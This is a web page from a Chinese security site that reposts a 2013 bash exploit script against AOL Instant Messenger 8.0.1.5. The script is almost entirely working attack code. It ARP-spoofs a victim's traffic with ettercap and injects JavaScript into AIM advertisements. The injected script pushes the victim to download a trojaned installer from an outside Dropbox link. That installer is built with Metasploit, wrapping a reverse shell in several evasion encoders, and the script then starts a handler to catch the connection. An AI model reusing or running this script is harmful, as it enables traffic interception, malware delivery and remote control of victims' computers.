首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AOL Instant Messenger 8.0.1.5 Binary Planting
来源:vfocus.net 作者:Whittaker 发布时间:2013-07-09  
#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

ATTACKER="192.168.2.10";
VICTIM="192.168.2.5";
GATEWAY="192.168.2.1";
REVPORT="443";
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";

mkdir ~/aimpwn;
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
echo "}" >> ~/aimpwn/aimpwn.filter;
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;
### wget section.
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to
### change ATTACKER IP or port.
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenNetAdmin 13.03.01 Remote C
·Google Chrome 25.0.1364.152 HT
·Adobe Reader X 10.1.4.38 - BMP
·Solaris Recommended Patch Clus
·InstantCMS 1.6 Remote PHP Code
·ERS Viewer 2013 ERS File Handl
·Opera 12.15 Denial Of Service
·SikaBoom Remote Buffer overflo
·Nokia 1280 Denial Of Service
·Apache CXF prior to 2.5.10, 2.
·Realtek Sound Manager AvRack (
·Jolix Media Player 1.1.0 (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved